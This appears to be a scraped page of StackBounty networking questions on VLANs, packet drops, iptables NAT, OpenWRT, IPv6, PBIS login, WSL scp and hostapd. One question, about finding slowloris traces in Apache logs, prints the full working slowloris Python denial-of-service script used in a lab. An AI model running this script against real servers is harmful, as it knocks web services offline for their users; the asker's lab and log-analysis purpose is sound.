#StackBounty: #networking #router #dhcp #wireless-access-point #vlan Does enabling VLAN on an Wifi AP requires specific hardware requir…

Bounty: 50

I think this is a basic VLAN question but I can’t find an explicit answer.

I have a wifi access point which is capable to broadcast multiple SSID’s and configure VLANS (tagged).

My DHCP is a simple TP-LINK router with 4 LAN ports.

The problem is that, if I connect through wifi with a (tagged) VLAN, lets say PUBLIC, my client doesn’t receive an IP-address.

So, although the VLAN’s are configured at the access point, does the router need to have some special specifications to support the VLAN’S? If so; which ones?

Bonus question

If I have a switch which supports VLAN; does the router still requires the same sort of support?


Get this bounty!!!

#StackBounty: #networking #wireshark #ubuntu-16.04 #tcpdump How to capture "droped packets" in tcpdump

Bounty: 50

I have a problem with my networking performance. I am using Ubuntu 16.04 on VMware Cloud Server with NIC E1000. But I see some packets droped in sections of ifconfig command:

root@ubuntu:~# ifconfig ens192
ens192    Link encap:Ethernet  HWaddr 00:50:56:03:25:14  
          inet addr:192.16.1.100  Bcast:192.16.1.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:574749 errors:0 dropped:83 overruns:0 frame:0
          TX packets:76478 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:44109471 (44.1 MB)  TX bytes:19484534 (19.4 MB)

Althought it just some packets droped but my server is running a real-time game online, so you know it impacts my clients that are connecting to it.

I have done in some researching and exploring informations on Google, after that i tried to change config file for buffer ring, max windows size, and so on. But it still “drop” my packets.

SO, now I want to capture packets that droped for analyzing what type of packets exactly it is.

I also tried this capture for my view in wireshark:

sudo tcpdump -i ens192 -n -w /var/www/html/logs.pcap -C 1 -Z root

But i don’t think i can see what packets is droped! I think packets droped is ignored before going to the filter of tcpdump.

Can you suggest me what method to capture “droped packets” above (dropped:83)?

Thanks in advance!


Get this bounty!!!

#StackBounty: #networking #iptables #routing #nat change source address of outgoing traffic destined to second network alias of source …

Bounty: 50

I have following setup:

ip addr:

2: ens4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 01:12:23:34:45:5f brd ff:ff:ff:ff:ff:ff
    inet xxx.xxx.xxx.xxx/24 brd xxx.xxx.xxx.xxx scope global ens4
       valid_lft forever preferred_lft forever
    inet 192.168.0.2/24 scope global ens4:1
       valid_lft forever preferred_lft forever
    inet 192.168.0.3/24 scope global secondary ens4:2
       valid_lft forever preferred_lft forever

I would like to have all traffic from 192.168.0.2 destined to 192.168.0.3 to show as if the source was 192.168.0.3.

The reason is I have speciffic configuration on postgres that I cannot change. This postgres is only accepting connections when source is 192.168.0.3, so if source becomes 192.168.0.2 then connection will be refused.

The above questions is result of answer received here: How to add ip route to route traffic through interface when destination is also that interface (it is not possible to change source IP address with static routes when two aliases are configured within the same network)

The answer to following question seems to be related to my question although it does not result in rule being added: https://unix.stackexchange.com/questions/243451/iptables-change-local-source-address-if-destination-address-matches

I already tried following nat rules:

iptables -t nat -A POSTROUTING -o ens4 -j MASQUERADE
iptables -A FORWARD -i ens4 --source 192.168.0.2/32 -o 192.168.0.3 -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -i ens4 --source 192.168.0.2/32 -o 192.168.0.3 -j ACCEPT

Above derived from here: http://www.revsys.com/writings/quicktips/nat.html


Get this bounty!!!

#StackBounty: #networking #virtualbox #virtual-machine #openwrt #gateway Failed to connect to Internet when using an OpenWRT VM as gate…

Bounty: 50

I have set up an OpenWRT x86-64 virtual machine with VirtualBox. The VM has two network interface, one for LAN and the other for WAN, all bridged to Wi-Fi interface of the host (Macbook). I want the VM to be the gateway for devices in the same LAN of the host.

If I change my host’s IP to the OpenWRT VM’s IP range and change host’s gateway to OpenWRT VM, then my host will be able to surf the Internet and I can verify the traffic is through OpenWRT VM.

The same holds for other VMs on the host.

However, for other devices in the same LAN of the host, after configuring their IP and gateway, I find that they can access the OpenWRT VM (for example, access the LuCI), but they cannot access the Internet.

I have been working on this for hours and still cannot figure out why. I don’t think it is the problem of OpenWRT configuration because the host and other VMs on the host work well. Any ideas?


Get this bounty!!!

#StackBounty: #networking #security #apache-http-server Detecting slowloris attack by checking Apache log

Bounty: 50

I’m doing simulation of a slowloris attack on a Debian server running Apache.

The attacking machines are Debian too.

In order to make sure that the slowloris attack was effective, I would like to access the Apache logs and check if the denial of service occurred and if it stopped accepting connections, the state of the buffers, and so on. The time of the attacks are known.

I am using in a lab this slowloris code:
https://github.com/gkbrk/slowloris

http://pastebin.com/CsjTavjN

#!/usr/bin/python
import socket, random, time, sys, argparse, random, logging

parser = argparse.ArgumentParser(description="Slowloris, low bandwidth stress test tool for websites")
parser.add_argument('host',  nargs="?", help="Host to preform stress test on")
parser.add_argument('-p', '--port', default=80, help="Port of webserver, usually 80", type=int)
parser.add_argument('-s', '--sockets', default=150, help="Number of sockets to use in the test", type=int)
parser.add_argument('-v', '--verbose', dest="verbose", action="store_true", help="Increases logging")
parser.add_argument('-ua', '--randuseragents', dest="randuseragent", action="store_true", help="Randomizes user-agents with each request")
parser.add_argument('-x', '--useproxy', dest="useproxy", action="store_true", help="Use a SOCKS5 proxy for connecting")
parser.add_argument('--proxy-host', default="127.0.0.1", help="SOCKS5 proxy host")
parser.add_argument('--proxy-port', default="8080", help="SOCKS5 proxy port", type=int)
parser.set_defaults(verbose=False)
parser.set_defaults(randuseragent=False)
parser.set_defaults(useproxy=False)
args = parser.parse_args()

if len(sys.argv)<=1:
    parser.print_help()
    sys.exit(1)

if not args.host:
    print("Host required!")
    parser.print_help()
    sys.exit(1)

if args.useproxy:
    print("Using SOCKS5 proxy for connecting...")
    try:
        import socks
        socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, args.proxy_host, args.proxy_port)
        socket.socket = socks.socksocket
    except ImportError:
        print("Socks Proxy Library Not Available!")
if args.verbose == True:
    logging.basicConfig(format="[%(asctime)s] %(message)s", datefmt="%d-%m-%Y %H:%M:%S", level=logging.DEBUG)
else:
    logging.basicConfig(format="[%(asctime)s] %(message)s", datefmt="%d-%m-%Y %H:%M:%S", level=logging.INFO)

list_of_sockets = []
user_agents = [
    "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0",
    "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0","Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
    "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14",
    "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393"
]

def init_socket(ip):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(4)
    s.connect((ip,args.port))

    s.send("GET /?{} HTTP/1.1rn".format(random.randint(0, 2000)).encode("utf-8"))
    if args.randuseragent:
        s.send("User-Agent: {}rn".format(random.choice(user_agents)).encode("utf-8"))
    else:
        s.send("User-Agent: {}rn".format(user_agents[0]).encode("utf-8"))
    s.send("{}rn".format("Accept-language: en-US,en,q=0.5").encode("utf-8"))
    return s

def main():
    ip = args.host
    socket_count = args.sockets
    logging.info("Attacking %s with %s sockets.", ip, socket_count)

    logging.info("Creating sockets...")
    for _ in range(socket_count):
        try:
            logging.debug("Creating socket nr %s", _)
            s = init_socket(ip)
        except socket.error:
            break
        list_of_sockets.append(s)

    while True:
        logging.info("Sending keep-alive headers... Socket count: %s", len(list_of_sockets))
        for s in list(list_of_sockets):
            try:
                s.send("X-a: {}rn".format(random.randint(1, 5000)).encode("utf-8"))
            except socket.error:
                list_of_sockets.remove(s)

        for _ in range(socket_count - len(list_of_sockets)):
            logging.debug("Recreating socket...")
            try:
                s = init_socket(ip)
                if s:
                    list_of_sockets.append(s)
            except socket.error:
                break
        time.sleep(15)

if __name__ == "__main__":
    main()

Does Apache provide such information? Where to check in Debian? Any suggestions on what else to check?


Get this bounty!!!

#StackBounty: #linux #networking #fedora #networkmanager #pptp Fedora 25, pptp connects but not working, too many transferred packets

Bounty: 50

After update to Fedora 25 one of my PPTP connections strangely works. Remote net is not available.

It is connected, successfully get remote net IP address. While connected nothing is available in remote net, but internet works fine. After a few minutes connection breaks by itself.

I’ve noticed strange thing, while pptp connection is on there are too much TX packets transferred:

ppp0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST>  mtu 1400
        inet 192.168.1.96  netmask 255.255.255.255  destination ___.__.___.___
        ppp  txqueuelen 3  (Point-to-Point Protocol)
        RX packets 10  bytes 172 (172.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 9864041  bytes 5842982146 (5.4 GiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

In a 10-15 seconds it shows up to 5.4 GiB of packets. It grows very fast.

The same if firewalld is disabled.

I’m using Network-Manager to connect to pptp.

[root@c0rp ~]# lsb_release -a
LSB Version:    :core-4.1-amd64:core-4.1-noarch:cxx-4.1-amd64:cxx-4.1-noarch:desktop-4.1-amd64:desktop-4.1-noarch:languages-4.1-amd64:languages-4.1-noarch:printing-4.1-amd64:printing-4.1-noarch
Distributor ID: Fedora
Description:    Fedora release 25 (Twenty Five)
Release:    25
Codename:   TwentyFive
[root@c0rp ~]# uname -a
Linux c0rp 4.10.8-200.fc25.x86_64 #1 SMP Fri Mar 31 13:20:22 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

Can someone help me to investigate the problem, please


Get this bounty!!!

#StackBounty: #networking #wireless-networking #router #dd-wrt #ipv6 Hosts connected to DD-WRT router running radvd get IPv6 addresses …

Bounty: 100

I’m trying to get IPv6 working on my local network. I know my ISP (Comcast) supports it because anything connected to the modem/router combo I rent from them gets assigned an IPv6 address and communicate using the protocol (can connect to ipv6.google.com and gets 20/20 on http://test-ipv6.com/).

However when I connect my own router (Netgreat WNDR3800, if it’s relevant) running DD-WRT to the Comcast modem/router combo none of the hosts can communicate over IPv6, although they get assigned IPv6 addresses in the prefix I was delegated by Comcast.

It seems to fail before it even leaves the LAN. Attempting to ping the IPv6 address of the router returns “Destination host unreachable”. My guess would be that I’m missing a route somewhere, but I am not familiar enough with IPv6 or routing to know how to test that theory or how to resolve it.

Technical details:

Router: WNDR3800 running DD-WRT v24-sp2. Its IPv6 configuration looks like this:

enter image description here

Router ifconfig:

root@DD-WRT:~# ifconfig
ath1      Link encap:Ethernet  HWaddr [redacted]
          inet6 addr: fe80::224e:7fff:fe74:13da/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:188122 errors:0 dropped:0 overruns:0 frame:0
          TX packets:227134 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:26587839 (25.3 MiB)  TX bytes:211385503 (201.5 MiB)

br0       Link encap:Ethernet  HWaddr [redacted]
          inet addr:192.168.2.1  Bcast:192.168.2.255  Mask:255.255.255.0
          inet6 addr: fe80::224e:7fff:fe74:13d8/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:190093 errors:0 dropped:0 overruns:0 frame:0
          TX packets:217213 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:24491040 (23.3 MiB)  TX bytes:204922896 (195.4 MiB)

br0:0     Link encap:Ethernet  HWaddr [redacted]
          inet addr:169.254.255.1  Bcast:169.254.255.255  Mask:255.255.0.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1

eth0      Link encap:Ethernet  HWaddr [redacted]
          inet6 addr: fe80::224e:7fff:fe74:13d8/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1989 errors:0 dropped:0 overruns:0 frame:0
          TX packets:21615 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:569599 (556.2 KiB)  TX bytes:3297349 (3.1 MiB)
          Interrupt:4

eth1      Link encap:Ethernet  HWaddr [redacted]
          inet addr:10.0.0.59  Bcast:10.0.0.255  Mask:255.255.255.0
          inet6 addr: 2601:601:XXXX:XXXX:XXXX:XXXX:XXXX:13d9/64 Scope:Global
          inet6 addr: fe80::224e:7fff:fe74:13d9/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:216381 errors:0 dropped:0 overruns:0 frame:0
          TX packets:181622 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:202350364 (192.9 MiB)  TX bytes:25482727 (24.3 MiB)
          Interrupt:5

ipconfig from Windows 8.1 host connected to the router:

C:Usersseth>ipconfig

Windows IP Configuration


Wireless LAN adapter Wi-Fi:

   Connection-specific DNS Suffix  . :
   IPv6 Address. . . . . . . . . . . : 2601:601:XXXX:XXXX:XXXX:XXXX:XXXX:75c3
   Temporary IPv6 Address. . . . . . : 2601:601:XXXX:XXXX:XXXX:XXXX:XXXX:2b13
   Link-local IPv6 Address . . . . . : fe80::18b5:93d6:d9db:75c3%4
   IPv4 Address. . . . . . . . . . . : 192.168.2.100
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.2.1

(unrelated interfaces removed from output. lo, VMWare, etc)


Get this bounty!!!

#StackBounty: #14.04 #networking #password #active-directory #likewise Problem with PBISOpen and Ubuntu 14.04LTS

Bounty: 100

I’m testing openpbis 8.3 version and I have authentication problem when I’m trying to open new session on Ubuntu 14.04 LTS, not in local network but only in distant network.

Adding the computer on active directory is very simple and I didn’t have any problem, on my local and distant network.

But when I want opening session with my active directory account, I have the message “wrong password”

So I reinitialized, under active directory, the password, and trying again to open the session

I enter the default password, no problem, the system ask me to enter new password, no message and everything seems to be OK, after this, I entered my login and password and I have the message wrong password.

If I use the same login and password on a windows 7 PC, no problem for opening session.

I’m trying to debug openpbis:

Make Sure You Are Joined to the Domain
/opt/pbis/bin/domainjoin-cli query
Name = chou-l64
Domain = mydomain.LAN
Distinguished Name = CN=CHOU-L64,CN=Computers,DC=mydomain,DC=lan

###

Check Whether You Are Using a Valid Logon Form
MYDOMAINusername
works

###

Clear the Cache
/opt/pbis/bin/ad-cache --delete-all
ok

###

Check the Status of the PBIS Authentication Service
/opt/pbis/bin/lwsm status lsass
running (container: 1436)

###

Check Communication between the PBIS Service and AD
/opt/pbis/bin/get-dc-name mydomain.lan

Printing LWNET_DC_INFO fields:
===============================
dwDomainControllerAddressType = 24
dwFlags = 312
dwVersion = 5
wLMToken = 65535
wNTToken = 65535
pszDomainControllerName = robinson.mydomain.lan
pszDomainControllerAddress = 172.16.0.253
pucDomainGUID(hex) = 21 40 5F 7F EB EA 19 4E 8E 42 0E 13 96 19 AF EB 
pszNetBIOSDomainName = MYDOMAIN
pszFullyQualifiedDomainName = mydomain.lan
pszDnsForestName = mydomain.lan
pszDCSiteName = Lyon
pszClientSiteName = Paris
pszNetBIOSHostName = ROBINSON
pszUserName = <EMPTY>

###

Verify that PBIS Can Find a User in AD
/opt/pbis/bin/find-user-by-name MYDOMAIN.lan\dupond
User info (Level-0):
====================
Name:              dupond
SID:               S-1-5-21-545202174-1067577326-598125351-6851
Uid:               1657281219
Gid:               1657274881
Gecos:             dupond dupond
Shell:             /bin/bash
Home dir:          /home/dupond
Logon restriction: NO

/opt/pbis/bin/find-user-by-name mydomain.lan\admindupont
User info (Level-0):
====================
Name:              admindupont
SID:               S-1-5-21-545202174-1067577326-598125351-6830
Uid:               1657281198
Gid:               1657274881
Gecos:             Administrateur dupont
Shell:             /bin/bash
Home dir:          /home/admindupont
Logon restriction: NO

###

Make Sure the AD Authentication Provider Is Running

/opt/pbis/bin/get-status
LSA Server Status:

Compiled daemon version: 8.3.0.3287
Packaged product version: 8.3.3287.68880
Uptime:        0 days 1 hours 47 minutes 43 seconds

[Authentication provider: lsa-activedirectory-provider]

    Status:        Online
    Mode:          Un-provisioned
    Domain:        MYDOMAIN.LAN
    Domain SID:    S-1-5-21-545202174-1067577326-598125351
    Forest:        mydomain.lan
    Site:          Lyon
    Online check interval:  300 seconds
    [Trusted Domains: 1]

    [Domain: MYDOMAIN]

            DNS Domain:       mydomain.lan
            Netbios name:     MYDOMAIN
            Forest name:      mydomain.lan
            Trustee DNS name: 
            Client site name: Paris
            Domain SID:       S-1-5-21-545202174-1067577326-598125351
            Domain GUID:      00000000-0000-0000-0000-000000000000
            Trust Flags:      [0x001d]
                              [0x0001 - In forest]
                              [0x0004 - Tree root]
                              [0x0008 - Primary]
                              [0x0010 - Native]
            Trust type:       Up Level
            Trust Attributes: [0x0000]
            Trust Direction:  Primary Domain
            Trust Mode:       In my forest Trust (MFT)
            Domain flags:     [0x0003]
                              [0x0001 - Primary]
                              [0x0002 - Offline]

            [Domain Controller (DC) Information]

                    DC Name:              robinson.mydomain.lan
                    DC Address:           172.16.0.253
                    DC Site:              Lyon
                    DC Flags:             [0x00000138]
                    DC Is PDC:            no
                    DC is time server:    no
                    DC has writeable DS:  yes
                    DC is Global Catalog: no
                    DC is running KDC:    yes

###

Run the id Command to Check the User
id mydomain.lan\dupond
uid=1657281219(dupond) gid=1657274881(utilisa.^du^domaine groupes=1657274881(utilisa.^du^domaine)

###

/etc/nsswitch.conf
passwd:         compat lsass
group:          compat lsass
shadow:         compat
hosts:          files dns
networks:       files
protocols:      db files
services:       db files
ethers:         db files
rpc:            db files
netgroup:       nis

###

/etc/pam.d/less common-session

session [default=1]                     pam_permit.so
session requisite                       pam_deny.so
session required                        pam_permit.so
session optional        pam_umask.so
session required        pam_unix.so 
session [success=ok default=ignore]     pam_lsass.so 
session optional        pam_mount.so 
session optional        pam_systemd.so 
session optional                        pam_ck_connector.so nox11

When I’m trying to open session in this PC i have these messages in /var/log/auth.log:

Jul 23 15:22:26 chou-l64 login[1728]: [lsass-pam] [module:pam_lsass]pam_sm_authenticate error [login:dupond][error code:40355]
Jul 23 15:22:29 chou-l64 login[1728]: FAILED LOGIN (1) on '/dev/tty1' FOR 'dupond', Authentication failure
Jul 23 15:24:25 chou-l64 sshd[11898]: [lsass-pam] [module:pam_lsass]pam_sm_authenticate error [login:dupond][error code:40355]
Jul 23 15:24:26 chou-l64 sshd[11896]: error: PAM: Authentication failure for dupond from localhost
Jul 23 15:24:34 chou-l64 sshd[11919]: [lsass-pam] [module:pam_lsass]pam_sm_authenticate error [login:dupond][error code:40355]
Jul 23 15:24:39 chou-l64 sshd[11922]: [lsass-pam] [module:pam_lsass]pam_sm_authenticate error [login:dupond][error code:40022]
Jul 23 15:24:41 chou-l64 sshd[11896]: message repeated 2 times: [ error: PAM: Authentication failure for dupond from localhost]
Jul 23 15:24:50 chou-l64 sshd[11896]: [lsass-pam] [module:pam_lsass]pam_sm_authenticate error [login:dupond][error code:40022]
Jul 23 15:24:52 chou-l64 sshd[11896]: Failed password for dupond from 127.0.0.1 port 39657 ssh2
Jul 23 15:24:58 chou-l64 sshd[11896]: [lsass-pam] [module:pam_lsass]pam_sm_authenticate error [login:dupond][error code:40355]
Jul 23 15:25:01 chou-l64 sshd[11896]: Failed password for dupond from 127.0.0.1 port 39657 ssh2

How can I resolve this problem?


Get this bounty!!!

#StackBounty: #networking #ssh #scp #wsl WSL – Can't scp-ssh a file from a remote machine to a local machine

Bounty: 50

I use a WSL Ubuntu 16.04.02 (fully updated and upgraded) and I Can’t secure copy a file via an scp-ssh sequence.

I already created host keys in WSL via sudo ssh-keygen -A and I already tried to login while the OpenSSH seerver is on, on WSL (I made that sure sudo service ssh start).

My problem:

sudo scp /var/www/html/tiesto USER@IP:/mnt/c/Users/USER/Desktop/

Brings:

connection timed out

As you can see, I try to copy the file “tiesto” from inside a remote machine, into my local WSL machine but the connection is timed out.

This does not happen when I try to do the same action between two other machines.

Things I already tried to solve it:

  • I already made sure OpenSSH is installed (sudo apt-get install openssh-server).
  • I tried to remove fail2ban (the only IPS I installed) but still couldn’t scp’ing.
  • I didn’t change the native ssh port from 22 to something else.
  • I tried scp’ing into this amchine from 2 different remote machines and in both cases had the same error.

My question:

What might be missing (if at all) in WSL that I could try to add someway so to bring back the scp-ssh functionality?


Get this bounty!!!

#StackBounty: #networking #16.04 #server #hostapd Is there a way to debug wireless access point issues that was setup with hostapd?

Bounty: 50

I am trying to setup a wireless access point with a home PC. I replaced my old Intel wifi link 5100 with Atheros AR9462. I recently did a fresh Ubuntu Server 16.04 install.

To setup wireless access point I installed hostapd and created a simple configuration

# cat /etc/hostapd/hostapd.conf 
interface=wlp3s0
driver=nl80211
ssid=mytestnetwork
channel=1
auth_algs=1
ignore_broadcast_ssid=0
wpa=0

And here is how my network interfaces are configured:

# cat /etc/network/interfaces
source /etc/network/interfaces.d/*

auto lo
iface lo inet loopback

auto enp1s0
iface enp1s0 inet dhcp

auto wlp3s0
iface wlp3s0 inet static
address 10.10.0.1
netmask 255.255.255.0

After these configurations, I rebooted the device. My network is active (checked via /etc/init.d/networking status). hostapd (checked via service hostapd status) seems to be running fine. However, I cannot event detect the wireless access point from any other device.

My wireless card is functioning in master mode:

# iwconfig
wlp3s0    IEEE 802.11abgn  Mode:Master  Tx-Power=19 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off

lo        no wireless extensions.

enp1s0    no wireless extensions.

My network hardware results look like the following:

# lshw -C network
  *-network               
       description: Ethernet interface
       product: RTL8111/8168/8411 PCI Express Gigabit Ethernet Controller
       vendor: Realtek Semiconductor Co., Ltd.
       physical id: 0
       bus info: pci@0000:01:00.0
       logical name: enp1s0
       version: 07
       serial: 00:e0:4c:68:18:fd
       size: 1Gbit/s
       capacity: 1Gbit/s
       width: 64 bits
       clock: 33MHz
       capabilities: pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation
       configuration: autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3LK-NAPI duplex=full firmware=rtl8168e-3_0.0.4 03/27/12 ip=192.168.1.6 latency=0 link=yes multicast=yes port=MII speed=1Gbit/s
       resources: irq:120 ioport:e000(size=256) memory:a0004000-a0004fff memory:a0000000-a0003fff
  *-network
       description: Wireless interface
       product: AR9462 Wireless Network Adapter
       vendor: Qualcomm Atheros
       physical id: 0
       bus info: pci@0000:03:00.0
       logical name: wlp3s0
       version: 01
       serial: 44:c3:06:31:a7:b0
       width: 64 bits
       clock: 33MHz
       capabilities: pm msi pciexpress bus_master cap_list rom ethernet physical wireless
       configuration: broadcast=yes driver=ath9k driverversion=4.4.0-62-generic firmware=N/A ip=10.10.0.1 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
       resources: irq:18 memory:81200000-8127ffff memory:81280000-8128ffff

How can I troubleshoot this issue further and find out what is going wrong?


Get this bounty!!!